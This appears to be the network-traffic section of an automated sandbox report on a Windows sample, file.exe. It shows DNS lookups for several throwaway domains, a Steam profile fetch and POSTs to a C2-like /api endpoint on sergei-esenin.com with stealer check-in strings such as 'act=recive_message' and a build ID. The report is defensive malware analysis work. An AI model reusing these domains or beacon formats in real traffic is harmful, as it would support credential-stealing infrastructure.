                                                Oct 14, 2024 11:03:11.925266981 CEST49699443192.168.2.7104.102.49.254
                                                Oct 14, 2024 11:03:11.951106071 CEST49699443192.168.2.7104.102.49.254
                                                Oct 14, 2024 11:03:11.951155901 CEST44349699104.102.49.254192.168.2.7
                                                Oct 14, 2024 11:03:12.697824001 CEST44349699104.102.49.254192.168.2.7
                                                Oct 14, 2024 11:03:12.697920084 CEST49699443192.168.2.7104.102.49.254
                                                Oct 14, 2024 11:03:12.930027962 CEST49699443192.168.2.7104.102.49.254
                                                Oct 14, 2024 11:03:12.930061102 CEST44349699104.102.49.254192.168.2.7
                                                Oct 14, 2024 11:03:12.930936098 CEST44349699104.102.49.254192.168.2.7
                                                Oct 14, 2024 11:03:12.973983049 CEST49699443192.168.2.7104.102.49.254
                                                Oct 14, 2024 11:03:13.209891081 CEST49699443192.168.2.7104.102.49.254
                                                Oct 14, 2024 11:03:13.255403042 CEST44349699104.102.49.254192.168.2.7
                                                Oct 14, 2024 11:03:13.680783987 CEST44349699104.102.49.254192.168.2.7
                                                Oct 14, 2024 11:03:13.680840015 CEST44349699104.102.49.254192.168.2.7
                                                Oct 14, 2024 11:03:13.680864096 CEST49699443192.168.2.7104.102.49.254
                                                Oct 14, 2024 11:03:13.680901051 CEST44349699104.102.49.254192.168.2.7
                                                Oct 14, 2024 11:03:13.680917025 CEST44349699104.102.49.254192.168.2.7
                                                Oct 14, 2024 11:03:13.680932045 CEST49699443192.168.2.7104.102.49.254
                                                Oct 14, 2024 11:03:13.680943966 CEST44349699104.102.49.254192.168.2.7
                                                Oct 14, 2024 11:03:13.680959940 CEST49699443192.168.2.7104.102.49.254
                                                Oct 14, 2024 11:03:13.680980921 CEST49699443192.168.2.7104.102.49.254
                                                Oct 14, 2024 11:03:13.681004047 CEST49699443192.168.2.7104.102.49.254
                                                Oct 14, 2024 11:03:13.818034887 CEST44349699104.102.49.254192.168.2.7
                                                Oct 14, 2024 11:03:13.818094015 CEST44349699104.102.49.254192.168.2.7
                                                Oct 14, 2024 11:03:13.818288088 CEST49699443192.168.2.7104.102.49.254
                                                Oct 14, 2024 11:03:13.818289042 CEST49699443192.168.2.7104.102.49.254
                                                Oct 14, 2024 11:03:13.818361044 CEST44349699104.102.49.254192.168.2.7
                                                Oct 14, 2024 11:03:13.818429947 CEST49699443192.168.2.7104.102.49.254
                                                Oct 14, 2024 11:03:13.825016975 CEST44349699104.102.49.254192.168.2.7
                                                Oct 14, 2024 11:03:13.825095892 CEST49699443192.168.2.7104.102.49.254
                                                Oct 14, 2024 11:03:13.825124025 CEST44349699104.102.49.254192.168.2.7
                                                Oct 14, 2024 11:03:13.825208902 CEST49699443192.168.2.7104.102.49.254
                                                Oct 14, 2024 11:03:13.825223923 CEST44349699104.102.49.254192.168.2.7
                                                Oct 14, 2024 11:03:13.825284958 CEST44349699104.102.49.254192.168.2.7
                                                Oct 14, 2024 11:03:13.825339079 CEST49699443192.168.2.7104.102.49.254
                                                Oct 14, 2024 11:03:13.826143980 CEST49699443192.168.2.7104.102.49.254
                                                Oct 14, 2024 11:03:13.826175928 CEST44349699104.102.49.254192.168.2.7
                                                Oct 14, 2024 11:03:13.841752052 CEST49701443192.168.2.7104.21.53.8
                                                Oct 14, 2024 11:03:13.841783047 CEST44349701104.21.53.8192.168.2.7
                                                Oct 14, 2024 11:03:13.841871023 CEST49701443192.168.2.7104.21.53.8
                                                Oct 14, 2024 11:03:13.842657089 CEST49701443192.168.2.7104.21.53.8
                                                Oct 14, 2024 11:03:13.842673063 CEST44349701104.21.53.8192.168.2.7
                                                Oct 14, 2024 11:03:14.326862097 CEST44349701104.21.53.8192.168.2.7
                                                Oct 14, 2024 11:03:14.327282906 CEST49701443192.168.2.7104.21.53.8
                                                Oct 14, 2024 11:03:14.328744888 CEST49701443192.168.2.7104.21.53.8
                                                Oct 14, 2024 11:03:14.328749895 CEST44349701104.21.53.8192.168.2.7
                                                Oct 14, 2024 11:03:14.329134941 CEST44349701104.21.53.8192.168.2.7
                                                Oct 14, 2024 11:03:14.330966949 CEST49701443192.168.2.7104.21.53.8
                                                Oct 14, 2024 11:03:14.330966949 CEST49701443192.168.2.7104.21.53.8
                                                Oct 14, 2024 11:03:14.331053019 CEST44349701104.21.53.8192.168.2.7
                                                Oct 14, 2024 11:03:14.459703922 CEST44349701104.21.53.8192.168.2.7
                                                Oct 14, 2024 11:03:14.459805012 CEST44349701104.21.53.8192.168.2.7
                                                Oct 14, 2024 11:03:14.459898949 CEST44349701104.21.53.8192.168.2.7
                                                Oct 14, 2024 11:03:14.459971905 CEST44349701104.21.53.8192.168.2.7
                                                Oct 14, 2024 11:03:14.460138083 CEST44349701104.21.53.8192.168.2.7
                                                Oct 14, 2024 11:03:14.460230112 CEST49701443192.168.2.7104.21.53.8
                                                Oct 14, 2024 11:03:14.460597992 CEST49701443192.168.2.7104.21.53.8
                                                Oct 14, 2024 11:03:14.460777998 CEST49701443192.168.2.7104.21.53.8
                                                Oct 14, 2024 11:03:14.460777998 CEST49701443192.168.2.7104.21.53.8
                                                Oct 14, 2024 11:03:14.460788965 CEST44349701104.21.53.8192.168.2.7
                                                Oct 14, 2024 11:03:14.460797071 CEST44349701104.21.53.8192.168.2.7
                                                Oct 14, 2024 11:03:14.592235088 CEST49707443192.168.2.7104.21.53.8
                                                Oct 14, 2024 11:03:14.592293978 CEST44349707104.21.53.8192.168.2.7
                                                Oct 14, 2024 11:03:14.592447996 CEST49707443192.168.2.7104.21.53.8
                                                Oct 14, 2024 11:03:14.592781067 CEST49707443192.168.2.7104.21.53.8
                                                Oct 14, 2024 11:03:14.592798948 CEST44349707104.21.53.8192.168.2.7
                                                Oct 14, 2024 11:03:15.068820000 CEST44349707104.21.53.8192.168.2.7
                                                Oct 14, 2024 11:03:15.070534945 CEST49707443192.168.2.7104.21.53.8
                                                Oct 14, 2024 11:03:15.070534945 CEST49707443192.168.2.7104.21.53.8
                                                Oct 14, 2024 11:03:15.070561886 CEST44349707104.21.53.8192.168.2.7
                                                Oct 14, 2024 11:03:15.071377993 CEST44349707104.21.53.8192.168.2.7
                                                Oct 14, 2024 11:03:15.073215008 CEST49707443192.168.2.7104.21.53.8
                                                Oct 14, 2024 11:03:15.073215008 CEST49707443192.168.2.7104.21.53.8
                                                Oct 14, 2024 11:03:15.073308945 CEST44349707104.21.53.8192.168.2.7
                                                Oct 14, 2024 11:03:15.542407990 CEST44349707104.21.53.8192.168.2.7
                                                Oct 14, 2024 11:03:15.542829990 CEST44349707104.21.53.8192.168.2.7
                                                Oct 14, 2024 11:03:15.542962074 CEST49707443192.168.2.7104.21.53.8
                                                Oct 14, 2024 11:03:15.594626904 CEST49707443192.168.2.7104.21.53.8
                                                Oct 14, 2024 11:03:15.594657898 CEST44349707104.21.53.8192.168.2.7
                                                Oct 14, 2024 11:03:15.594665051 CEST49707443192.168.2.7104.21.53.8
                                                Oct 14, 2024 11:03:15.594671965 CEST44349707104.21.53.8192.168.2.7
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 14, 2024 11:03:11.568758965 CEST5566553192.168.2.71.1.1.1
                                                Oct 14, 2024 11:03:11.578018904 CEST53556651.1.1.1192.168.2.7
                                                Oct 14, 2024 11:03:11.616616964 CEST5048253192.168.2.71.1.1.1
                                                Oct 14, 2024 11:03:11.626558065 CEST53504821.1.1.1192.168.2.7
                                                Oct 14, 2024 11:03:11.628627062 CEST6103453192.168.2.71.1.1.1
                                                Oct 14, 2024 11:03:11.638441086 CEST53610341.1.1.1192.168.2.7
                                                Oct 14, 2024 11:03:11.640630007 CEST5200153192.168.2.71.1.1.1
                                                Oct 14, 2024 11:03:11.651756048 CEST53520011.1.1.1192.168.2.7
                                                Oct 14, 2024 11:03:11.653259039 CEST5723653192.168.2.71.1.1.1
                                                Oct 14, 2024 11:03:11.662905931 CEST53572361.1.1.1192.168.2.7
                                                Oct 14, 2024 11:03:11.668184996 CEST5156253192.168.2.71.1.1.1
                                                Oct 14, 2024 11:03:11.678180933 CEST53515621.1.1.1192.168.2.7
                                                Oct 14, 2024 11:03:11.686785936 CEST6397553192.168.2.71.1.1.1
                                                Oct 14, 2024 11:03:11.696476936 CEST53639751.1.1.1192.168.2.7
                                                Oct 14, 2024 11:03:11.800128937 CEST5165453192.168.2.71.1.1.1
                                                Oct 14, 2024 11:03:11.811631918 CEST53516541.1.1.1192.168.2.7
                                                Oct 14, 2024 11:03:11.841077089 CEST6186353192.168.2.71.1.1.1
                                                Oct 14, 2024 11:03:11.849689007 CEST53618631.1.1.1192.168.2.7
                                                Oct 14, 2024 11:03:13.829816103 CEST6145253192.168.2.71.1.1.1
                                                Oct 14, 2024 11:03:13.840518951 CEST53614521.1.1.1192.168.2.7
                                                Oct 14, 2024 11:03:53.246499062 CEST5359993162.159.36.2192.168.2.7
                                                Oct 14, 2024 11:03:53.758929014 CEST53609041.1.1.1192.168.2.7
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Oct 14, 2024 11:03:11.568758965 CEST192.168.2.71.1.1.10x9effStandard query (0)clearancek.siteA (IP address)IN (0x0001)false
                                                Oct 14, 2024 11:03:11.616616964 CEST192.168.2.71.1.1.10xdaddStandard query (0)mobbipenju.storeA (IP address)IN (0x0001)false
                                                Oct 14, 2024 11:03:11.628627062 CEST192.168.2.71.1.1.10xc5c4Standard query (0)eaglepawnoy.storeA (IP address)IN (0x0001)false
                                                Oct 14, 2024 11:03:11.640630007 CEST192.168.2.71.1.1.10xc29bStandard query (0)dissapoiznw.storeA (IP address)IN (0x0001)false
                                                Oct 14, 2024 11:03:11.653259039 CEST192.168.2.71.1.1.10x83dbStandard query (0)studennotediw.storeA (IP address)IN (0x0001)false
                                                Oct 14, 2024 11:03:11.668184996 CEST192.168.2.71.1.1.10x619dStandard query (0)bathdoomgaz.storeA (IP address)IN (0x0001)false
                                                Oct 14, 2024 11:03:11.686785936 CEST192.168.2.71.1.1.10xb3f6Standard query (0)spirittunek.storeA (IP address)IN (0x0001)false
                                                Oct 14, 2024 11:03:11.800128937 CEST192.168.2.71.1.1.10x472Standard query (0)licendfilteo.siteA (IP address)IN (0x0001)false
                                                Oct 14, 2024 11:03:11.841077089 CEST192.168.2.71.1.1.10xd58cStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                Oct 14, 2024 11:03:13.829816103 CEST192.168.2.71.1.1.10x744fStandard query (0)sergei-esenin.comA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Oct 14, 2024 11:03:11.578018904 CEST1.1.1.1192.168.2.70x9effName error (3)clearancek.sitenonenoneA (IP address)IN (0x0001)false
                                                Oct 14, 2024 11:03:11.626558065 CEST1.1.1.1192.168.2.70xdaddName error (3)mobbipenju.storenonenoneA (IP address)IN (0x0001)false
                                                Oct 14, 2024 11:03:11.638441086 CEST1.1.1.1192.168.2.70xc5c4Name error (3)eaglepawnoy.storenonenoneA (IP address)IN (0x0001)false
                                                Oct 14, 2024 11:03:11.651756048 CEST1.1.1.1192.168.2.70xc29bName error (3)dissapoiznw.storenonenoneA (IP address)IN (0x0001)false
                                                Oct 14, 2024 11:03:11.662905931 CEST1.1.1.1192.168.2.70x83dbName error (3)studennotediw.storenonenoneA (IP address)IN (0x0001)false
                                                Oct 14, 2024 11:03:11.678180933 CEST1.1.1.1192.168.2.70x619dName error (3)bathdoomgaz.storenonenoneA (IP address)IN (0x0001)false
                                                Oct 14, 2024 11:03:11.696476936 CEST1.1.1.1192.168.2.70xb3f6Name error (3)spirittunek.storenonenoneA (IP address)IN (0x0001)false
                                                Oct 14, 2024 11:03:11.811631918 CEST1.1.1.1192.168.2.70x472Name error (3)licendfilteo.sitenonenoneA (IP address)IN (0x0001)false
                                                Oct 14, 2024 11:03:11.849689007 CEST1.1.1.1192.168.2.70xd58cNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                Oct 14, 2024 11:03:13.840518951 CEST1.1.1.1192.168.2.70x744fNo error (0)sergei-esenin.com104.21.53.8A (IP address)IN (0x0001)false
                                                Oct 14, 2024 11:03:13.840518951 CEST1.1.1.1192.168.2.70x744fNo error (0)sergei-esenin.com172.67.206.204A (IP address)IN (0x0001)false
                                                • steamcommunity.com
                                                • sergei-esenin.com
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.749699104.102.49.2544437576C:\Users\user\Desktop\file.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-14 09:03:13 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                Connection: Keep-Alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                Host: steamcommunity.com
                                                2024-10-14 09:03:13 UTC1870INHTTP/1.1 200 OK
                                                Server: nginx
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                Cache-Control: no-cache
                                                Date: Mon, 14 Oct 2024 09:03:13 GMT
                                                Content-Length: 34837
                                                Connection: close
                                                Set-Cookie: sessionid=42a5f93178e54f41e8bcf130; Path=/; Secure; SameSite=None
                                                Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                2024-10-14 09:03:13 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                2024-10-14 09:03:13 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                2024-10-14 09:03:13 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                                2024-10-14 09:03:13 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.749701104.21.53.84437576C:\Users\user\Desktop\file.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-14 09:03:14 UTC264OUTPOST /api HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                Content-Length: 8
                                                Host: sergei-esenin.com
                                                2024-10-14 09:03:14 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                Data Ascii: act=life
                                                2024-10-14 09:03:14 UTC555INHTTP/1.1 200 OK
                                                Date: Mon, 14 Oct 2024 09:03:14 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OVnfhxm770B5OTK3sr4%2FOMc02DOBsFyV%2BwWuFp2z4tzzYkTcXzvxDuyhcdgCONGsr1uN7mumLML%2BCRnDJXVKggIk1X8GL834kNA0E%2BU7in2WlUGqvpioNQwyodvoBPR7C7VQOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8d266523084a43fb-EWR
                                                2024-10-14 09:03:14 UTC814INData Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                2024-10-14 09:03:14 UTC1369INData Raw: 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27
                                                Data Ascii: les/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('
                                                2024-10-14 09:03:14 UTC1369INData Raw: 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69
                                                Data Ascii: agement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <i
                                                2024-10-14 09:03:14 UTC889INData Raw: 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62
                                                Data Ascii: <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="b
                                                2024-10-14 09:03:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.749707104.21.53.84437576C:\Users\user\Desktop\file.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-14 09:03:15 UTC354OUTPOST /api HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: application/x-www-form-urlencoded
                                                Cookie: __cf_mw_byp=AqhxCjlq_E3AgO9n.7dMsBL7zg.kGWAWYSyOi_3alMM-1728896594-0.0.1.1-/api
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                Content-Length: 52
                                                Host: sergei-esenin.com
                                                2024-10-14 09:03:15 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                2024-10-14 09:03:15 UTC835INHTTP/1.1 200 OK
                                                Date: Mon, 14 Oct 2024 09:03:15 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Set-Cookie: PHPSESSID=47f0s1brka4d99rmtv1137dkg4; expires=Fri, 07 Feb 2025 02:49:54 GMT; Max-Age=9999999; path=/
                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                Cache-Control: no-store, no-cache, must-revalidate
                                                Pragma: no-cache
                                                cf-cache-status: DYNAMIC
                                                vary: accept-encoding
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UWxVE6M8NyRecs22wx95PbUUa%2FpW%2BSztonTFkD2bmm1ass8YcGsvJ%2BaCTJt576r9%2FpEBZ94ag%2BbDickQjc45nmyl91nE%2BwP%2BJjcPiWduzoGMKA9O5DB5IzmYQIzfppj09XoPKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8d266527b9d919cf-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-10-14 09:03:15 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                Data Ascii: aerror #D12
                                                2024-10-14 09:03:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Click to jump to process

                                                Click to jump to process
